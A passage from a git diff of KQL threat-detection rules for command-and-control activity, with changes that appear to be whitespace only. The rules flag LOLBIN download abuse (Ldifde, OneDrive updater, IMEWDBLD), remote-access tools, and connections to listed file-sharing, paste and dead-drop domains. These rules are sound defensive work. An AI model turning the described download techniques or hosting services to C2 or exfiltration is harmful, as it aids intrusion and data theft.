+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath endswith "\\mstsc.exe" and FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql b/KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql
index 8e81c6be..6b4d70a8 100644
--- a/KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql
+++ b/KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql
@@ -1,12 +1,12 @@
-// Title: Import LDAP Data Interchange Format File Via Ldifde.EXE
-// Author: @gott_cyber
-// Date: 2022-09-02
-// Level: medium
-// Description: Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.defense-evasion, attack.t1218, attack.t1105
-// False Positives:
-// - Since the content of the files are unknown, false positives are expected
-
-DeviceProcessEvents
+// Title: Import LDAP Data Interchange Format File Via Ldifde.EXE
+// Author: @gott_cyber
+// Date: 2022-09-02
+// Level: medium
+// Description: Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.defense-evasion, attack.t1218, attack.t1105
+// False Positives:
+// - Since the content of the files are unknown, false positives are expected
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-i" and ProcessCommandLine contains "-f") and (FolderPath endswith "\\ldifde.exe" or ProcessVersionInfoOriginalFileName =~ "ldifde.exe")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/installation_of_teamviewer_desktop.kql b/KQL/rules/Command and Control/installation_of_teamviewer_desktop.kql
index b5161330..1d275f65 100644
--- a/KQL/rules/Command and Control/installation_of_teamviewer_desktop.kql
+++ b/KQL/rules/Command and Control/installation_of_teamviewer_desktop.kql
@@ -1,10 +1,10 @@
-// Title: Installation of TeamViewer Desktop
-// Author: frack113
-// Date: 2022-01-28
-// Level: medium
-// Description: TeamViewer_Desktop.exe is create during install
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1219.002
-
-DeviceFileEvents
+// Title: Installation of TeamViewer Desktop
+// Author: frack113
+// Date: 2022-01-28
+// Level: medium
+// Description: TeamViewer_Desktop.exe is create during install
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+
+DeviceFileEvents
 | where FolderPath endswith "\\TeamViewer_Desktop.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql b/KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql
index 612c4319..f6a7ead2 100644
--- a/KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql
+++ b/KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql
@@ -1,12 +1,12 @@
-// Title: Local Network Connection Initiated By Script Interpreter
-// Author: frack113
-// Date: 2022-08-28
-// Level: medium
-// Description: Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-// False Positives:
-// - Legitimate scripts
-
-DeviceNetworkEvents
+// Title: Local Network Connection Initiated By Script Interpreter
+// Author: frack113
+// Date: 2022-08-28
+// Level: medium
+// Description: Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - Legitimate scripts
+
+DeviceNetworkEvents
 | where (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) and (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql b/KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql
index e4b55399..cd2f98f8 100644
--- a/KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql
+++ b/KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql
@@ -1,11 +1,11 @@
-// Title: Lolbas OneDriveStandaloneUpdater.exe Proxy Download
-// Author: frack113
-// Date: 2022-05-28
-// Level: high
-// Description: Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any
-// anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-
-DeviceRegistryEvents
+// Title: Lolbas OneDriveStandaloneUpdater.exe Proxy Download
+// Author: frack113
+// Date: 2022-05-28
+// Level: high
+// Description: Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any
+// anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\SOFTWARE\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/mstsc_exe_execution_with_local_rdp_file.kql b/KQL/rules/Command and Control/mstsc_exe_execution_with_local_rdp_file.kql
index 138d524c..f8c8e76b 100644
--- a/KQL/rules/Command and Control/mstsc_exe_execution_with_local_rdp_file.kql
+++ b/KQL/rules/Command and Control/mstsc_exe_execution_with_local_rdp_file.kql
@@ -1,12 +1,12 @@
-// Title: Mstsc.EXE Execution With Local RDP File
-// Author: Nasreddine Bencherchali (Nextron Systems), Christopher Peacock @securepeacock
-// Date: 2023-04-18
-// Level: low
-// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1219.002
-// False Positives:
-// - Likely with legitimate usage of ".rdp" files
-
-DeviceProcessEvents
+// Title: Mstsc.EXE Execution With Local RDP File
+// Author: Nasreddine Bencherchali (Nextron Systems), Christopher Peacock @securepeacock
+// Date: 2023-04-18
+// Level: low
+// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Likely with legitimate usage of ".rdp" files
+
+DeviceProcessEvents
 | where ((ProcessCommandLine endswith ".rdp" or ProcessCommandLine endswith ".rdp\"") and (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe")) and (not((ProcessCommandLine contains "C:\\ProgramData\\Microsoft\\WSL\\wslg.rdp" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lxss\\wslhost.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql b/KQL/rules/Command and Control/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql
index 0ff75d09..bdc3d740 100644
--- a/KQL/rules/Command and Control/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql
+++ b/KQL/rules/Command and Control/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql
@@ -1,12 +1,12 @@
-// Title: Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2018-08-30
-// Level: high
-// Description: Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-// False Positives:
-// - Some installers located in the temp directory might communicate with the Github domains in order to download additional software. Baseline these cases or move the github domain to a lower level hunting rule.
-
-DeviceNetworkEvents
+// Title: Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2018-08-30
+// Level: high
+// Description: Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - Some installers located in the temp directory might communicate with the Github domains in order to download additional software. Baseline these cases or move the github domain to a lower level hunting rule.
+
+DeviceNetworkEvents
 | where (RemoteUrl endswith ".githubusercontent.com" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "dl.dropboxusercontent.com" or RemoteUrl endswith "ghostbin.co" or RemoteUrl endswith "glitch.me" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onrender.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "pixeldrain.com" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "storjshare.io" or RemoteUrl endswith "supabase.co" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "workers.dev") and (InitiatingProcessFolderPath contains ":\\$Recycle.bin" or InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Default\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Fonts\\" or InitiatingProcessFolderPath contains ":\\Windows\\IME\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\AppData\\Temp\\" or InitiatingProcessFolderPath contains "\\config\\systemprofile\\" or InitiatingProcessFolderPath
contains "\\Windows\\addins\\")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/network_communication_initiated_to_portmap_io_domain.kql b/KQL/rules/Command and Control/network_communication_initiated_to_portmap_io_domain.kql
index d3b1434f..2a539c84 100644
--- a/KQL/rules/Command and Control/network_communication_initiated_to_portmap_io_domain.kql
+++ b/KQL/rules/Command and Control/network_communication_initiated_to_portmap_io_domain.kql
@@ -1,12 +1,12 @@
-// Title: Network Communication Initiated To Portmap.IO Domain
-// Author: Florian Roth (Nextron Systems)
-// Date: 2024-05-31
-// Level: medium
-// Description: Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors
-// MITRE Tactic: Command and Control
-// Tags: attack.t1041, attack.command-and-control, attack.t1090.002, attack.exfiltration
-// False Positives:
-// - Legitimate use of portmap.io domains
-
-DeviceNetworkEvents
+// Title: Network Communication Initiated To Portmap.IO Domain
+// Author: Florian Roth (Nextron Systems)
+// Date: 2024-05-31
+// Level: medium
+// Description: Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors
+// MITRE Tactic: Command and Control
+// Tags: attack.t1041, attack.command-and-control, attack.t1090.002, attack.exfiltration
+// False Positives:
+// - Legitimate use of portmap.io domains
+
+DeviceNetworkEvents
 | where RemoteUrl endswith ".portmap.io"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql b/KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql
index 3d8afe17..d7c11ee2 100644
--- a/KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql
+++ b/KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql
@@ -1,10 +1,10 @@
-// Title: Network Connection Initiated By IMEWDBLD.EXE
-// Author: frack113
-// Date: 2022-01-22
-// Level: high
-// Description: Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-
-DeviceNetworkEvents
+// Title: Network Connection Initiated By IMEWDBLD.EXE
+// Author: frack113
+// Date: 2022-01-22
+// Level: high
+// Description: Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceNetworkEvents
 | where InitiatingProcessFolderPath endswith "\\IMEWDBLD.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql b/KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql
index 02cb3442..b45c7855 100644
--- a/KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql
+++ b/KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql
@@ -1,10 +1,10 @@
-// Title: Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2017-03-19
-// Level: high
-// Description: Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-
-DeviceNetworkEvents
+// Title: Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2017-03-19
+// Level: high
+// Description: Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceNetworkEvents
 | where (InitiatingProcessFolderPath contains ":\\$Recycle.bin" or InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Default\\" or InitiatingProcessFolderPath contains ":\\Windows\\Fonts\\" or InitiatingProcessFolderPath contains ":\\Windows\\IME\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Tasks\\" or InitiatingProcessFolderPath contains "\\config\\systemprofile\\" or InitiatingProcessFolderPath contains "\\Windows\\addins\\") and (not((RemoteUrl endswith ".githubusercontent.com" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "dl.dropboxusercontent.com" or RemoteUrl endswith "ghostbin.co" or RemoteUrl endswith "glitch.me" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith
"mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onrender.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "portmap.io" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "storjshare.io" or RemoteUrl endswith "supabase.co" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "workers.dev"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql b/KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql index 084bc6b6..75b2be6b 100644 --- a/KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql +++ b/KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql 
@@ -1,10 +1,10 @@
-// Title: Network Connection Initiated To AzureWebsites.NET By Non-Browser Process
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-06-24
-// Level: medium
-// Description: Detects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1102, attack.t1102.001
-
-DeviceNetworkEvents
+// Title: Network Connection Initiated To AzureWebsites.NET By Non-Browser Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-06-24
+// Level: medium
+// Description: Detects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102, attack.t1102.001
+
+DeviceNetworkEvents
 | where RemoteUrl endswith "azurewebsites.net" and (not(((InitiatingProcessFolderPath endswith "\\avant.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avant Browser\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Avant Browser\\")) or (InitiatingProcessFolderPath endswith "\\brave.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\BraveSoftware\\") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\") or ((InitiatingProcessFolderPath contains "C:\\Program Files\\Windows Defender Advanced Threat Protection\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\Windows Defender\\" or
InitiatingProcessFolderPath contains "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") and (InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or InitiatingProcessFolderPath endswith "\\MsSense.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Discord\\" and InitiatingProcessFolderPath endswith "\\Discord.exe") or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or InitiatingProcessFolderPath =~ "" or (InitiatingProcessFolderPath endswith "\\falkon.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Falkon\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Falkon\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Mozilla Firefox\\firefox.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Flock\\" and InitiatingProcessFolderPath endswith "\\Flock.exe") or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Maxthon\\" and InitiatingProcessFolderPath endswith "\\maxthon.exe") or isnull(InitiatingProcessFolderPath) or 
(InitiatingProcessFolderPath contains "\\AppData\\Local\\Programs\\Opera\\" and InitiatingProcessFolderPath endswith "\\opera.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Phoebe\\" and InitiatingProcessFolderPath endswith "\\Phoebe.exe") or (InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\PRTG Network Monitor\\PRTG Probe.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PRTG Network Monitor\\PRTG Probe.exe") or (InitiatingProcessFolderPath endswith "\\QtWeb.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\QtWeb\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\QtWeb\\")) or ((InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Safari\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\Safari\\") and InitiatingProcessFolderPath endswith "\\safari.exe") or (InitiatingProcessFolderPath endswith "\\seamonkey.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\SeaMonkey\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SeaMonkey\\")) or (InitiatingProcessFolderPath endswith "\\slimbrowser.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\SlimBrowser\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SlimBrowser\\")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Vivaldi\\" and InitiatingProcessFolderPath endswith "\\vivaldi.exe") or (InitiatingProcessFolderPath endswith "\\whale.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Naver\\Naver Whale\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Naver\\Naver Whale\\")) or (InitiatingProcessFolderPath endswith "\\Waterfox.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Waterfox\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Waterfox\\")))))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql b/KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql
index e717d49b..5feed99f 100644
--- a/KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql
+++ b/KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql
@@ -1,14 +1,14 @@
-// Title: New Connection Initiated To Potential Dead Drop Resolver Domain
-// Author: Sorina Ionescu, X__Junior (Nextron Systems)
-// Date: 2022-08-17
-// Level: high
-// Description: Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.
-// In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1102, attack.t1102.001
-// False Positives:
-// - One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender.
-// - Ninite contacting githubusercontent.com
-
-DeviceNetworkEvents
+// Title: New Connection Initiated To Potential Dead Drop Resolver Domain
+// Author: Sorina Ionescu, X__Junior (Nextron Systems)
+// Date: 2022-08-17
+// Level: high
+// Description: Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.
+// In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102, attack.t1102.001
+// False Positives:
+// - One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender.
+// - Ninite contacting githubusercontent.com
+
+DeviceNetworkEvents
 | where (RemoteUrl endswith ".t.me" or RemoteUrl endswith "4shared.com" or RemoteUrl endswith "abuse.ch" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "cloudflare.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "discord.com" or RemoteUrl endswith "docs.google.com" or RemoteUrl endswith "drive.google.com" or RemoteUrl endswith "dropbox.com" or RemoteUrl endswith "dropmefiles.com" or RemoteUrl endswith "facebook.com" or RemoteUrl endswith "feeds.rapidfeeds.com" or RemoteUrl endswith "fotolog.com" or RemoteUrl endswith "ghostbin.co/" or RemoteUrl endswith "githubusercontent.com" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "imgur.com" or RemoteUrl endswith "livejournal.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onedrive.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "pixeldrain.com" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "reddit.com" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "steamcommunity.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "technet.microsoft.com" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "twitter.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "vimeo.com" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "wetransfer.com" or RemoteUrl endswith "workers.dev" or RemoteUrl endswith "youtube.com") and (not(((InitiatingProcessFolderPath endswith "\\avant.exe" and
(InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avant Browser\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Avant Browser\\")) or (InitiatingProcessFolderPath endswith "\\brave.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\BraveSoftware\\") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\") or ((InitiatingProcessFolderPath contains "C:\\Program Files\\Windows Defender Advanced Threat Protection\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath contains "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") and (InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or InitiatingProcessFolderPath endswith "\\MsSense.exe")) or ((RemoteUrl endswith "discord.com" or RemoteUrl endswith "cdn.discordapp.com") and InitiatingProcessFolderPath contains "\\AppData\\Local\\Discord\\" and InitiatingProcessFolderPath endswith "\\Discord.exe") or (RemoteUrl endswith "dropbox.com" and (InitiatingProcessFolderPath endswith "\\Dropbox.exe" or InitiatingProcessFolderPath endswith "\\DropboxInstaller.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Dropbox\\Client\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Dropbox\\Client\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or 
InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or InitiatingProcessFolderPath =~ "" or (InitiatingProcessFolderPath endswith "\\falkon.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Falkon\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Falkon\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Mozilla Firefox\\firefox.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Flock\\" and InitiatingProcessFolderPath endswith "\\Flock.exe") or (RemoteUrl endswith "drive.google.com" and (InitiatingProcessFolderPath contains "C:\\Program Files\\Google\\Drive File Stream\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Google\\Drive File Stream\\") and InitiatingProcessFolderPath endswith 